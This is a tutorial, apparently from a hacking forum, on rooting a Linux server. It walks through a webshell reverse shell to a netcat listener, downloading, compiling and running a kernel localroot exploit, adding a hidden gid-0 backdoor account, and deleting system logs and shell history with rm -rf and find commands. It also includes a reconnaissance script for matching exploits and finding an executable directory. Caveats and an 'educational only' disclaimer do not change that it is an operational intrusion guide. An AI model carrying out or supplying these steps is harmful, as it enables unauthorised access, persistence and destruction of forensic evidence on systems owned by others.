Hello guys, hope you are all doing great! Today I will explain how to root a Linux server with a localroot exploit.
What is rooting?
Rooting is the process of exploiting a vulnerability, usually in the kernel (a local privilege escalation, or "localroot"), to go from an unprivileged account on a server to administrator (root) rights.
Requirements:
Basic Unix/Linux command knowledge
Shell access on the targeted server (an unprivileged shell is enough; that is what the localroot escalates from)
A PHP webshell with a backconnect option (the original post links the WSO 2.5 webshell)
A localroot exploit matching the target kernel (the original post links a collection; choosing one is covered below)
Netcat on your own machine
Let's get started.
[#] Backconnecting
First of all you need a port that the target can reach, so if you are behind a router you have to forward it (the original post links a port-forwarding guide). Open a command prompt or terminal, cd to the netcat directory and type:
nc -vlp 1337
where 1337 is the forwarded port (some netcat builds reject -p together with -l; there use nc -lv 1337 instead). It should say:
listening on [any] 1337 ...
Now go to your webshell and open its backconnect option (in the WSO webshell it is under Network). Enter your IP address and the port and click "Connect". Go back to your listener; if you see something like:
sh: no job control in this shell
it means the backconnect worked. The message only says the shell has no controlling terminal, which is normal for a reverse shell, but it also means programs that insist on a terminal (passwd, used further down, is one of them) may refuse to cooperate until you spawn a proper pty (for example through Python's pty module, if Python is installed on the box). Now let's start rooting the box.
[#] Choosing Localroot Exploit
You need a localroot that matches the target kernel exactly: the release, the year it was built and the architecture. Kernel exploits are written against specific versions, distribution kernels backport fixes without changing the upstream version number, and a mismatched exploit usually just fails or crashes the machine. The older and less patched the kernel, the better the chances of finding a working exploit. To see what the target is running, execute:
uname -rvmpio
which prints the release, build string, machine and platform on one line, something like:
2.6.18-348.12.1.el5PAE #1 SMP Wed Jan 01 06:17:31 EDT 2013 i686 i686 i386 GNU/Linux
Here 2.6.18-348.12.1.el5PAE is the kernel release (the el5 suffix marks a RHEL/CentOS 5 build, PAE the 32-bit large-memory variant), the build string ends with the build date (2013), and i686 is the architecture. Choose a localroot matching release, year and architecture from the collection, or search for the kernel version if the collection has none. Whatever you pick, test it on a matching kernel of your own first: a wrong localroot can panic a production kernel and end the engagement right there.
[#] Executing Localroot Exploit
Upload the localroot through the webshell, or, if it is hosted somewhere, download it onto the server with:
wget http://www.site.com/localroot.c
If the exploit is a .c source file you have to compile it; if it is already a binary, skip to the next step. To compile:
gcc filename.c -o outputfilename
If you get "permission denied" (or gcc is simply not installed), compile it on your own machine or another box with the same architecture and, ideally, the same distribution and glibc, then upload the binary. An exploit that runs fine elsewhere can still answer "permission denied" when started from a noexec mount such as a hardened /tmp, so put it in a directory that allows execution. Then give the file execute permission (the post uses 0777, which also makes it world-writable; +x would be enough):
chmod 0777 filename
Finally executing the exploit:
./filename
Now check whether you got root:
whoami
If it says root (id shows uid=0), you have successfully rooted the server. If it still shows your old user the exploit did not work; do not keep hammering the same box with one localroot after another, since a half-failed kernel exploit often leaves the kernel unstable.
[#] Adding New User
The following command, on a RHEL/CentOS-style system where adduser is the same program as useradd, creates a user named "r00t" with primary group 0 (root), the listed supplementary groups, /r00t as home directory and /bin/sh as shell:
adduser -g 0 r00t -G wheel,sys,bin,daemon,adm,disk -d /r00t -s /bin/sh
Note what this does and does not give you: the account has gid 0 and wheel membership, so it can read group-root files and su or sudo to root depending on configuration, but it is not uid 0 by itself. -d only records the home directory (add -m to create it), and on Debian/Ubuntu adduser is a different, interactive tool, so use useradd there. Now set a password for r00t:
passwd r00t
Enter a password, confirm it, and it should say:
passwd: all authentication tokens updated successfully.
Now you can log in with PuTTY or any SSH client, provided sshd accepts password logins and does not restrict which users may log in. Keep in mind that an extra account with gid 0 in /etc/passwd is exactly what administrators and host integrity checks look for first.
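The following script is an added example and not code from the original post. It collects the checks the steps above rely on: parsing the uname line into release, upstream version, build year and architecture (so the localroot can be matched properly), finding a directory the exploit can actually execute from, checking for gcc, verifying root by uid rather than by name, and verifying that an added account really has primary group 0. The sample uname line is the constructed one quoted above; the function names and the list of candidate directories are this example's own choices, and the noexec check only recognises directories that are mount points themselves.

```shell
#!/bin/sh
# Added example, not code from the original post: pre-flight and result checks
# for the "choose, compile, run, verify" steps above, in POSIX sh because the
# shell a backconnect hands you is usually plain sh with no tty.

# Constructed sample: the uname line quoted in the post (the format of
# "uname -rvmpio": release, version, machine, processor, platform, os).
SAMPLE_UNAME='2.6.18-348.12.1.el5PAE #1 SMP Wed Jan 01 06:17:31 EDT 2013 i686 i686 i386 GNU/Linux'

# kernel_release LINE: the release field, e.g. 2.6.18-348.12.1.el5PAE.
# The suffix after the dash is the distro build (el5 = RHEL/CentOS 5), which
# matters because distro kernels backport fixes the upstream number hides.
kernel_release() {
    printf '%s\n' "$1" | awk '{ print $1 }'
}

# kernel_base LINE: the upstream version only, e.g. 2.6.18.
kernel_base() {
    kernel_release "$1" | sed 's/-.*//'
}

# kernel_build_year LINE: the year that ends the build string (#1 SMP ... 2013).
kernel_build_year() {
    printf '%s\n' "$1" | awk '{
        for (i = 2; i <= NF; i++)
            if ($i ~ /^[0-9][0-9][0-9][0-9]$/) { print $i; exit }
    }'
}

# kernel_arch LINE: the machine field right after the year (i686 vs x86_64
# decides which binary you have to build).
kernel_arch() {
    printf '%s\n' "$1" | awk '{
        for (i = 2; i < NF; i++)
            if ($i ~ /^[0-9][0-9][0-9][0-9]$/) { print $(i + 1); exit }
    }'
}

# mounted_noexec DIR: true if DIR is itself a mount point listed with noexec
# in /proc/mounts (a directory below such a mount is not detected; good enough
# for the usual /tmp and /dev/shm cases).
mounted_noexec() {
    awk -v d="$1" '$2 == d && $4 ~ /(^|,)noexec(,|$)/ { found = 1 }
                   END { exit !found }' /proc/mounts 2>/dev/null
}

# exec_dir: first writable candidate directory that is not mounted noexec.
# A noexec /tmp is the usual reason "./exploit" says "Permission denied"
# even after chmod.
exec_dir() {
    for d in /tmp /dev/shm /var/tmp "${HOME:-}"; do
        [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ] || continue
        mounted_noexec "$d" && continue
        printf '%s\n' "$d"
        return 0
    done
    return 1
}

# have_gcc: whether the source can be compiled on the box at all; if not,
# build it elsewhere for the same arch and upload the binary.
have_gcc() { command -v gcc >/dev/null 2>&1; }

# got_root: the check behind "whoami" above, by uid rather than by name.
got_root() { [ "$(id -u)" -eq 0 ]; }

# account_has_gid0 USER: verify that an added account really has primary
# group 0, as the "adduser -g 0" line above intends (reads /etc/passwd directly).
account_has_gid0() {
    awk -F: -v u="$1" '$1 == u && $4 == 0 { ok = 1 } END { exit !ok }' /etc/passwd
}

# preflight_report: everything worth knowing before picking an exploit.
preflight_report() {
    line=$(uname -rvmpio 2>/dev/null || uname -rvm)
    echo "release : $(kernel_release "$line")  (upstream $(kernel_base "$line"))"
    echo "built   : $(kernel_build_year "$line")"
    echo "arch    : $(kernel_arch "$line")"
    echo "exec dir: $(exec_dir || echo 'none found (all candidates noexec or unwritable)')"
    if have_gcc; then echo "gcc     : present"; else echo "gcc     : missing, compile elsewhere"; fi
    if got_root; then echo "uid     : 0, already root"; else echo "uid     : $(id -u), not root"; fi
    return 0
}

preflight_report
```

Run it in the reverse shell before uploading anything: the "exec dir" line tells you where to put the binary, and the release line is what you match the localroot against (the full release including the distro suffix, not just 2.6.18).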
[#] Clearing Logs
Finally the post clears its traces by deleting the logs wholesale. Be clear about what this does: removing /var/log and the Apache log directories outright deletes far more than your own entries, is itself a glaring indicator of compromise, breaks syslog and Apache logging until the directories are recreated, and does nothing about copies that already went to a remote syslog server or SIEM. Daemons that still hold the deleted files open keep writing to the unlinked inodes, which lsof +L1 will list for any investigator. On an authorised engagement you do not do this at all; you document what you touched and leave the logs alone. With that said, the commands from the post, executed as root:
# shell history: the running shell rewrites $HISTFILE when it exits, so
# remove the file and then stop the shell from writing it again
rm -rf /tmp/logs
rm -rf "$HISTFILE"
unset HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.bash_logout
# web server logs (paths vary by build; only the ones that exist matter)
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
# login records and the whole system log tree
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
# /etc/wtmp and /etc/utmp are legacy Unix paths; on Linux these records live in
# /var/log/wtmp and /var/run/utmp, which are already covered above
rm -rf /etc/wtmp
rm -rf /etc/utmp
# per-user history and log files; the patterns must be quoted, otherwise the
# shell expands them in the current directory before find sees them
find / -name "*.bash_history" -exec rm -rf {} \;
find / -name "*.bash_logout" -exec rm -rf {} \;
find / -name "*.log" -exec rm -rf {} \;
# The post also ran:  find / -name "log*" -exec rm -rf {} \;
# Do not: -name "log*" matches by basename, so it also removes binaries such as
# /bin/login, /usr/bin/logger and /usr/sbin/logrotate and breaks the system.
Note: rooting a box you don't own is illegal; this information is for educational purposes only. Stay safe and good luck!